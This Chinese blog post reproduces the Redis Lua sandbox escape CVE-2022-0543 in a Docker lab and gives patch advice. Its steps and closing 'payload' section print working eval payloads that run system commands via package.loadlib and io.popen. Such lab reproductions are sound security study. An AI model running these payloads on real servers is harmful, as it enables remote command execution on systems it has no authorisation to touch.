CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)

已于 2024-04-22 11:04:33 修改
阅读量1.1k 收藏 6
点赞数 6
文章标签: redis 数据库 缓存 安全 web安全
于 2024-04-21 18:49:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xz_______/article/details/138041529
版权

0x01前言

Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。
redis 存在安全漏洞,攻击者可利用该漏洞远程执行代码。

0x02漏洞描述

在Debian系的Linux发行版系统上,由于打包问题,Redis在Lua解析器初始化后,package变量没有被正确清除,导致攻击者可以利用它来进行Lua沙箱逃逸,从而执行任意系统命令。目前,该漏洞显示只影响Debian系的 Linux 发行版系统(Debian、Ubuntu等)上的Redis服务,其他系统上的Redis服务暂不受影响。同时利用该漏洞需要具备可在Redis中执行eval命令的权限。

0x03漏洞影响版本

该 Redis 沙盒逃逸漏洞仅影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞

0x04 漏洞环境准备

靶机:直接docker拉取镜像,启动环境
攻击机:下载redis-cli用于远程连接redis服务器

0x05漏洞复现

1.通过docker拉取镜像,启动镜像环境
cd vulhub-master/redis/CVE-2022-0543/
docker-compose up -d

2.攻击机下载redis-cli
wget http://download.redis.io/redis-stable.tar.gz
3.解压下载好的文件:tar -zxvf redis-stable.tar.gz。
4.进入目录,看看是否安装成功
cd redis-stable
make

cp src/redis-cli /usr/bin/
redis-cli -h

5.使用redis-cli远程连接redis服务器:
redis-cli -h 192.168.235.134 -p 6379

6.借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,要指定正确的路径
local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”);
local io = io_l();
local f = io.popen(“id”, “r”);
local res = f:read(“*a”);
f:close();
return res
7.在攻击机上使用eval执行上述脚本,成功执行
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“id”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

8.查看当前用户,可以看见无法看到当前用户,这里是我的Ubuntu Redis是安全本版,这里就无法看到当前用户。
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“whoamin”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

0x06 修复建议

1、升级至安全版本:Debian Redis: 5:5.0.14-1+deb10u2 5:6.0.16-1+deb11u2 5:6.0.16-2Ubuntu Redis: 5:6.0.15-1ubuntu0.1 5:5.0.7-2ubuntu0.12.做好Redis鉴权限制和禁止对外网访问。
3.打上相关补丁
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787

0x07 参考
https://mp.weixin.qq.com/s/4fAmmkcyCTqY_B-U5Mr0kw

payload:
eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“uname -a”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”, “luaopen_io”); local io = io_l(); local f = io.popen(“id”, “r”); local res = f:read(“*a”); f:close(); return res’ 0

批量检测工具:

https://github.com/d-rn/vulBox/blob/main/CVE-2022-0543.py

不爱学习的安全小白
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
漏洞复现redis未授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1115
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
高性能零售IT系统的建设08-9年来在互联网零售O2O行业抗黑产、薅羊毛实战记录及打法
lifetragedy的专栏
12-11 1939
本篇以全景式黑产对抗把本人完整对抗亿级黑产、羊毛党的实战经验进行传授。对抗每秒万级并发很难,而对抗黑产是难上难。有时仅仅一个黑客的技术能力、智商是全面碾压一个企业甚至一个集团公司内所有IT人员的智慧累加的。但是我们只要记住:求“减损”不要“止损”,更谈不上“防损”!不要求打败,而是增加“黑产”的攻击成本!着眼于全局战役,而不要打“阵地战”!流量我要,权益你木有!这几句心法就能和黑产打得有来有去,游刃有余。
CVE-2022-0543(lua沙盒绕过命令执行)复现
kriesa的博客
07-13 579
CVE-2022-0543复现
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 525
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
CVE-2022-0543redis沙盒逃逸)详细漏洞复现
没事我溜达
03-25 8730
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行(CVE-2022-0543Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 直接写复现全过程吧
CVE-2022-0543Redis 沙盒逃逸漏洞
热门推荐
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 1928
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
CVE-2022-0543redis沙盒逃逸
huayimy的博客
02-03 887
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
CVE-2021-41773漏洞复现
Aquarius_ego的博客
03-24 1454
CVE-2021-41773漏洞复现
CVE-2019-2725漏洞复现
yeshankuangrenaaaaa的博客
07-23 4456
CVE-2019-2725漏洞复现???? Author:Iron Date:2020-07-10 漏洞描述 漏洞发布日期:2019-4-17 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 漏洞原理 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 841
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
redis lua沙盒绕过
08-14
- *2* [【CVE-2022-0543Redis Lua沙盒绕过命令执行复现](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
CVE-2022-0543
最新发布
sinat_25635183的博客
03-25 354
2、CVE-2022-0543Redis沙盒逃逸漏洞Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
CVE-2022-0543 Redis沙盒逃逸漏洞
weixin_45715461的博客
07-01 3572
CVE-2022-0543 Redis沙盒逃逸漏洞
Redis Lua沙盒绕过命令执行(CVE-2022-0543
swordheart的博客
06-23 427
漏洞原理介绍Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库缓存和消息代理。Redis 是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象,攻击利用这个对象的加载动态库,可以使用从 liblua 加载模块,然后使用此模块执行任意命令;参考链接:漏洞版本 漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后,我
简单漏洞CVE-2022-0543 Redis Lua 沙盒绕过
栉风沐雪的博客
01-29 1024
CVE-2022-0543 Redis Lua 沙盒绕过漏,在Lua沙箱中遗留了一个对象package,攻击者可以利用package对象提供的加载动态链接库liblua里的函数逃逸redis在用户连接后可以通过eval命令执行Lua脚本,但是脚本跑在沙箱中,正常情况下无法执行命令读取文件,所以这个漏洞的本质是沙箱绕过。一般情况下,redis运行在6379(默认端口),而在此镜像中映射于36770端口,可以使用nmap扫描端口发现相应服务。影响范围:Debian系得linux发行版本+Ubuntu。
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4573
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是沙盒化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值